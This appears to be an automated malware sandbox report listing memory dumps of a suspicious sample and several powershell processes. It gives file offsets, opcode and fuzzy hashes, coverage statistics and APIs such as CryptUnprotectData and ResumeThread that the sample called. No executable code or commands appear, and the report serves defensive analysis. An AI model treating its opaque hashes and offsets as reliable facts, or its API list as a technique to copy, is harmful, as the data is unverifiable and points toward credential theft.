                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4946793f4073aa45c94b9cf5c8f8e394b53c393d7a4f472038cd03666486e07f
                                                                                                                                                                          • Instruction ID: edec43391cfa3586ee75bc9f5e2e36f7c4025f922aa40d08a3dd059e37da4a0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4946793f4073aa45c94b9cf5c8f8e394b53c393d7a4f472038cd03666486e07f
                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0623184E2C99FD716DFB088A15A97FB4EF42200B1A01F6D189C70A2C6AE564AC752
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 040bb887ac8b6c8bb9f1f0f6ebdb2a8dfbf7bc7936566f0f5ec49150899814d2
                                                                                                                                                                          • Instruction ID: f17426e41731e21aaa5a16f14a577af731aa7b6718ea8096f43cf03532a212fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 040bb887ac8b6c8bb9f1f0f6ebdb2a8dfbf7bc7936566f0f5ec49150899814d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0C821A0E3DA4FDB328AA48CA11A63BD0EF1331471906B5C0548B0E7D5946915CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bb51b305f9fa8d34a2b32e6ca5905d3cf2eaad95f0f3373236396fd27a55a632
                                                                                                                                                                          • Instruction ID: 415e68a6b89aacc01a6e634927394545d66ede132bf2ce4ab15eaca7ee323269
                                                                                                                                                                          • Opcode Fuzzy Hash: bb51b305f9fa8d34a2b32e6ca5905d3cf2eaad95f0f3373236396fd27a55a632
                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0C811A0D7CA5FEB325EA44CE91A53BE0DF1331071A47FAC05C871F3D558A625C301
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 37c724ce86483d22d8d5d93c62b03311c362803e12ff3196652cd9cb954cf90e
                                                                                                                                                                          • Instruction ID: 7a744d411018295c14259def78c647ced26c52358fcdb356f4ec1decb85c8943
                                                                                                                                                                          • Opcode Fuzzy Hash: 37c724ce86483d22d8d5d93c62b03311c362803e12ff3196652cd9cb954cf90e
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F0A771F09BC84FDB55EBE494A226C3BE1EF59310B15006DD04EC72D7DE3459428740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 058616c0a37f0f33df9491b61a4b99de5f5dd7c5c3a60a93fd32a585b7e4de9f
                                                                                                                                                                          • Instruction ID: c8a1d32e6c47fb49ec3b2be73bc9e8861ffb0077c988e5658243d7949feabdee
                                                                                                                                                                          • Opcode Fuzzy Hash: 058616c0a37f0f33df9491b61a4b99de5f5dd7c5c3a60a93fd32a585b7e4de9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD0C261F0E2894FEB360AB048B41B82A91DF2738074A06F6C1994B2E3D859AA0D9712
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                                                                                                                                          • Instruction ID: 8cee04d22c56fc03be23ba233236d1c5beaa62b5c1196c7ef682acb0d14508d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                                                                                                                                          • Instruction Fuzzy Hash: 55D0C918B4F93F85F53846C2423023F5194BF50708F22403ED06F418F5CE5C7701AA06
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a9275298bb707659417054deebf1ff0bde1f806142d48fe670fecc73d6f1772f
                                                                                                                                                                          • Instruction ID: e7f2372351b957ecf3c0ce8da0e352e5392a3b8cb7c641060b8a8f26917ea07d
                                                                                                                                                                          • Opcode Fuzzy Hash: a9275298bb707659417054deebf1ff0bde1f806142d48fe670fecc73d6f1772f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7D09E14B1F54B45F9794DD240F02395195EF02700E2642B9C19F439F1896EFB025202
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 23d0c998d3b097a16a76a0efaffb1727c2496305bd01e1de497b6baba86623c0
                                                                                                                                                                          • Instruction ID: 66a23cc44e52b75da28a984a726eee66f994bae915971613e100fbe7415c36fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 23d0c998d3b097a16a76a0efaffb1727c2496305bd01e1de497b6baba86623c0
                                                                                                                                                                          • Instruction Fuzzy Hash: C0315022A0E3DA4FD713AF7898B54D43FA0AF13214B1A01F3D899CF0A3DA591C49C762
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5428300f24bcf0b02d88e0c2dffd9cfbb83a4ea36748404a130a0ef80ee7a92f
                                                                                                                                                                          • Instruction ID: 6d4cdac61311d44cebb0aae4736125fbde6f15cef96f9beaf9086d091a66beff
                                                                                                                                                                          • Opcode Fuzzy Hash: 5428300f24bcf0b02d88e0c2dffd9cfbb83a4ea36748404a130a0ef80ee7a92f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0B43091964C8FCB51DF1888195E57FE0FF25300B0101ABE449C7071E6659904CBC1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2795802441.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9b8ed000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6a0b7cbc4891af292e7f03ba07c202fa8fd48f603dcf7633fc667e609827f300
                                                                                                                                                                          • Instruction ID: 83f87069492edd0b942694fadac2ba8800a9cda961c2b64247c60173b374f2e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a0b7cbc4891af292e7f03ba07c202fa8fd48f603dcf7633fc667e609827f300
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B41277050EBC44FD79A9B2C9851A523FF0EF56321B1A05DFD088CB5A3D629A846C792
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 64ea36090fdfa5479d779a30f3b2ee682749c868dc56777b1bb448bd20f65062
                                                                                                                                                                          • Instruction ID: 7f69f4a09e33306cf73a7e450f5f8842d070a20a39c2624e4e294e065827ea4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 64ea36090fdfa5479d779a30f3b2ee682749c868dc56777b1bb448bd20f65062
                                                                                                                                                                          • Instruction Fuzzy Hash: C731B331A1CB4C8FDB18DF4CA84A6A97BE0FB99321F00422FE449D3251CA71A855CBC2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 77eaf251c877db941e55362c1356605d31d5aeac2506bd14c3f68a349c247ab9
                                                                                                                                                                          • Instruction ID: b5e4a48adbf912fa1387c517b5d5f2fe63ae95a32f1aed4eea7b97c7a0eef2bf
                                                                                                                                                                          • Opcode Fuzzy Hash: 77eaf251c877db941e55362c1356605d31d5aeac2506bd14c3f68a349c247ab9
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21063190CB4C4FDB59DFAC984A7E97FF0EB56320F04426BD049C3162DA75A85ACB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction ID: e1cc6c89a89e9ba7a721b261e804aa01ac8a4fa9e01c3454d27f86b3bcc9507d
                                                                                                                                                                          • Opcode Fuzzy Hash: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09A32B0E9098FD768EB4CE4518E873E0EF95320B1600BBE1ADC75B3CA25EC408740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction ID: bc7f985a0839a891a45ae042c8ceda9230e44c7bb71f731130ed0b27a99beb28
                                                                                                                                                                          • Opcode Fuzzy Hash: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0E232B0E5498FDBA4EB4CE0648A877E0FF8532470600BAE19DCB4B3CA25EC80C740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 060cbf5c6926f9373921e1497c4419669a32376a66f6ed45d368bdca15d30b57
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: DCE01A31B0C8089FDB78DB4CE0519E9B3E1EB9832171202BBE15EC7571CA22ED518B80
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                          • API String ID: 0-1500707516
                                                                                                                                                                          • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                          • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                                                                                          • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2783586753.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Instruction ID: 8ff078a52fdf77613b58769ffa0f50a521cb950202194b4cbf748532b21d0c99
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c56483c0dbb0159194d7dcc191794f51dd06454fd21e9773dc33efa524484f5
                                                                                                                                                                          • Instruction Fuzzy Hash: DA210630A0CB4C4FDB59DFAC984A6E97FF0EB56320F04416BD449C3162DA74985ACB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction ID: e1cc6c89a89e9ba7a721b261e804aa01ac8a4fa9e01c3454d27f86b3bcc9507d
                                                                                                                                                                          • Opcode Fuzzy Hash: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09A32B0E9098FD768EB4CE4518E873E0EF95320B1600BBE1ADC75B3CA25EC408740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction ID: bc7f985a0839a891a45ae042c8ceda9230e44c7bb71f731130ed0b27a99beb28
                                                                                                                                                                          • Opcode Fuzzy Hash: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0E232B0E5498FDBA4EB4CE0648A877E0FF8532470600BAE19DCB4B3CA25EC80C740
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 060cbf5c6926f9373921e1497c4419669a32376a66f6ed45d368bdca15d30b57
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: DCE01A31B0C8089FDB78DB4CE0519E9B3E1EB9832171202BBE15EC7571CA22ED518B80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f10521f1fde66030f0224c2b41597bb1d0a1eff70c7ef0da3f1f8cc9024be2c
                                                                                                                                                                          • Instruction ID: b274a96e7c298c55700ec3c5806b8f2f28a2921b3ca8d4eef678bc4f3b1ea3dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f10521f1fde66030f0224c2b41597bb1d0a1eff70c7ef0da3f1f8cc9024be2c
                                                                                                                                                                          • Instruction Fuzzy Hash: 12E01A35805A4C8FCF54EF18D8598E97BA0FF69201B0142ABE85DC7120DB719A58CBC2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2847346546.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9baf0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a61dc703d544fa20dafb8b4bee302d276af622cb54e3cd73e2cc81a49ca698ac
                                                                                                                                                                          • Instruction ID: 7ab751a6ef24f9a452da3f5aef871db5c7ee6a1c5475228519898d428cf923a6
                                                                                                                                                                          • Opcode Fuzzy Hash: a61dc703d544fa20dafb8b4bee302d276af622cb54e3cd73e2cc81a49ca698ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 80D12522B0FB8E0FEBA59BAC48655F57FA1EF16314B0901BED49DC71E3DA58A805C341
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 55cb65d1599da5020af5e5049b9cf47decad1140941a884b845f125b0db4abdf
                                                                                                                                                                          • Instruction ID: 5beb65c0f05f5279f36eea92da6d58f8da27a7750dd114c2e4b70542703c5a05
                                                                                                                                                                          • Opcode Fuzzy Hash: 55cb65d1599da5020af5e5049b9cf47decad1140941a884b845f125b0db4abdf
                                                                                                                                                                          • Instruction Fuzzy Hash: C101087594EBCC4FD7679B648C690947FB0AF67210B0A00EBD489CB1B3DA595908CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24bf081fe5c10377170f660e97a709f629bcd0a791a9cadce3aed5d98a8f3f31
                                                                                                                                                                          • Instruction ID: 93407c913784d778cb98f0ffa4d297e3b6be0603fc2d0a658f59a7e7330b5e4d
                                                                                                                                                                          • Opcode Fuzzy Hash: 24bf081fe5c10377170f660e97a709f629bcd0a791a9cadce3aed5d98a8f3f31
                                                                                                                                                                          • Instruction Fuzzy Hash: A201443544D7CC8FCB569F6888254A47FF0EF16210B0A41E7D449CB173D7699958C782
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2826271528.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9b90d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 37fa8d0089d7869beae9f8ef3fdd1a564018edf887e66e2d717d73b19692beb0
                                                                                                                                                                          • Instruction ID: c7e4db02a8c2425102fb70305775825cc1dc639f9331f7677b61417c8de3ac0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 37fa8d0089d7869beae9f8ef3fdd1a564018edf887e66e2d717d73b19692beb0
                                                                                                                                                                          • Instruction Fuzzy Hash: A441247180EBC85FE7568B3998659523FF0EF57320B1A01DFD0C8CB1A3D625A846C792
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d81ee09801d480a1b6267b226c90fb17c9df86245f91e9305b4ad9ec763c368
                                                                                                                                                                          • Instruction ID: c773e87bebe62fb6cdfe1187683eaf570f1c3b1846cf879869dd22f6c96dec20
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d81ee09801d480a1b6267b226c90fb17c9df86245f91e9305b4ad9ec763c368
                                                                                                                                                                          • Instruction Fuzzy Hash: 6731E631A1CB4C9FDB1CDB4C980A6A97BE0FBA9720F00422FE449D3251DB71A855CBC2
                                                                                                                                                                          Memory Dump Source

Execution Graph

Execution Coverage: 14.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 10.5%
Total number of Nodes: 38
Total number of Limit Nodes: 3
API calls labelled on execution graph nodes: CreateFileTransactedW, GetSystemInfo, VirtualAlloc, WriteFile, CryptUnprotectData, ResumeThread

Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)

Strings
Memory Dump Source
